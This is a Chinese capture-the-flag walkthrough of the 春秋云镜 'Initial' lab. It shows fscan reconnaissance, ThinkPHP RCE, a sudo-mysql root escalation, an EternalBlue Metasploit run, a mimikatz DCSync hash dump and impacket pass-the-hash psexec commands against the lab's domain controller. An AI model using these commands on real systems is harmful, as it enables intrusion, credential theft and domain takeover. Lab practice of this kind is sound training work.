lvzhouhang

春秋云镜-Initial

  • ~9.15K 字
  1. 1. FLAG1
  2. 2. FLAG2&&FLAG3

FLAG1

首先进行信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.232.66
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-18 08:00:46] [INFO] 暴力破解线程数: 1
[2025-04-18 08:00:46] [INFO] 开始信息扫描
[2025-04-18 08:00:46] [INFO] 最终有效主机数量: 1
[2025-04-18 08:00:46] [INFO] 开始主机扫描
[2025-04-18 08:00:46] [INFO] 有效端口数量: 233
[2025-04-18 08:00:46] [SUCCESS] 端口开放 39.99.232.66:22
[2025-04-18 08:00:46] [SUCCESS] 端口开放 39.99.232.66:80
[2025-04-18 08:00:46] [SUCCESS] 服务识别 39.99.232.66:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux  信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 08:00:51] [SUCCESS] 服务识别 39.99.232.66:80 => [http]
[2025-04-18 08:00:55] [INFO] 存活端口数量: 2
[2025-04-18 08:00:55] [INFO] 开始漏洞扫描
[2025-04-18 08:00:55] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-18 08:00:55] [SUCCESS] 网站标题 http://39.99.232.66       状态码:200 长度:5578   标题:Bootstrap Material Admin
[2025-04-18 08:00:57] [SUCCESS] 目标: http://39.99.232.66:80
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-04-18 08:01:01] [SUCCESS] 扫描已完成: 3/3

80端口存在thinkphp的漏洞,直接工具一把梭了,拿到shell后提一下权,sudo可以无密码执行mysql,mysql提权

1
2
3
4
5
(www-data:/) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
1
sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到了flag的第一部分

FLAG2&&FLAG3

写一个公钥进去,然后ssh登录,上传fscan再做一个代理

1
2
3
4
5
6
7
8
9
10
11
12
13
(www-data:/tmp) $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:25:0c:72 brd ff:ff:ff:ff:ff:ff
    inet 172.22.1.15/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315359017sec preferred_lft 315359017sec
    inet6 fe80::216:3eff:fe25:c72/64 scope link 
       valid_lft forever preferred_lft forever
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
root@ubuntu-web01:~# ./fscan -h 172.22.1.15/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-18 20:14:45] [INFO] 暴力破解线程数: 1
[2025-04-18 20:14:45] [INFO] 开始信息扫描
[2025-04-18 20:14:45] [INFO] CIDR范围: 172.22.1.0-172.22.1.255
[2025-04-18 20:14:45] [INFO] 生成IP范围: 172.22.1.0.%!d(string=172.22.1.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 20:14:45] [INFO] 解析CIDR 172.22.1.15/24 -> IP范围 172.22.1.0-172.22.1.255
[2025-04-18 20:14:45] [INFO] 最终有效主机数量: 256
[2025-04-18 20:14:45] [INFO] 开始主机扫描
[2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.15     存活 (ICMP)
[2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.21     存活 (ICMP)
[2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.2      存活 (ICMP)
[2025-04-18 20:14:45] [SUCCESS] 目标 172.22.1.18     存活 (ICMP)
[2025-04-18 20:14:48] [INFO] 存活主机数量: 4
[2025-04-18 20:14:48] [INFO] 有效端口数量: 233
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:88
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:80
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.15:80
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.15:22
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:445
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:445
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:445
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:389
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:139
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:139
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:139
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:135
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.2:135
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.21:135
[2025-04-18 20:14:48] [SUCCESS] 端口开放 172.22.1.18:3306
[2025-04-18 20:14:49] [SUCCESS] 服务识别 172.22.1.15:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 20:14:53] [SUCCESS] 服务识别 172.22.1.18:3306 => [mysql] 产品:MySQL 信息:unauthorized Banner:[D.j Host '172.22.1.15' is not allowed to connect to this MySQL server]
[2025-04-18 20:14:53] [SUCCESS] 服务识别 172.22.1.2:88 =>
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:445 =>
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:445 =>
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.21:445 =>
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.2:139 =>  Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:139 =>  Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.21:139 =>  Banner:[.]
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.18:80 => [http]
[2025-04-18 20:14:54] [SUCCESS] 服务识别 172.22.1.15:80 => [http]

[2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.18:135 =>
[2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.2:135 =>
[2025-04-18 20:15:54] [SUCCESS] 服务识别 172.22.1.21:135 =>
[2025-04-18 20:15:54] [INFO] 存活端口数量: 15
[2025-04-18 20:15:54] [INFO] 开始漏洞扫描
[2025-04-18 20:15:54] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.21
主机名: XIAORANG-WIN7
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.21
[2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.2
主机名: DC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.2
[2025-04-18 20:15:54] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.1.18
主机名: XIAORANG-OA01
发现的网络接口:
   IPv4地址:
      └─ 172.22.1.18
[2025-04-18 20:15:54] [SUCCESS] 网站标题 http://172.22.1.15        状态码:200 长度:5578   标题:Bootstrap Material Admin
[2025-04-18 20:15:54] [INFO] 系统信息 172.22.1.2 [Windows Server 2016 Datacenter 14393]
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.2      DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-18 20:15:54] [SUCCESS] 发现漏洞 172.22.1.21 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-18 20:15:54] [SUCCESS] 网站标题 http://172.22.1.18        状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.1.18?m=login
[2025-04-18 20:15:54] [SUCCESS] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[2025-04-18 20:15:55] [SUCCESS] 网站标题 http://172.22.1.18?m=login 状态码:200 长度:4012   标题:信呼协同办公系统
[2025-04-18 20:15:55] [SUCCESS] 目标: http://172.22.1.15:80
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

172.22.1.21 有永恒之蓝,上msf梭哈

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

收集一些域内哈希

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > load kiwi
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   09bb349ab17bbe480b91eb20bb204bee        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  25e4b9f501c8831b0568fcc61e4ddc7f        4096
1108    XIAORANG-WIN7$  acf1bc550440e81c9f2663ff304b4ab3        4096

有域控的哈希了直接打域控,然后就可以为所欲为了

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec  -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.2 -codec gbk
C:\Users\Administrator\flag> type flag03.txt
1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-psexec  -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/Administrator@172.22.1.18 -codec gbk
C:\Users\Administrator\flag> type flag02.txt

看别人的wp,好像是要先打172.22.1.18,是一个OA系统可以打nday一把梭,我就不看了

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!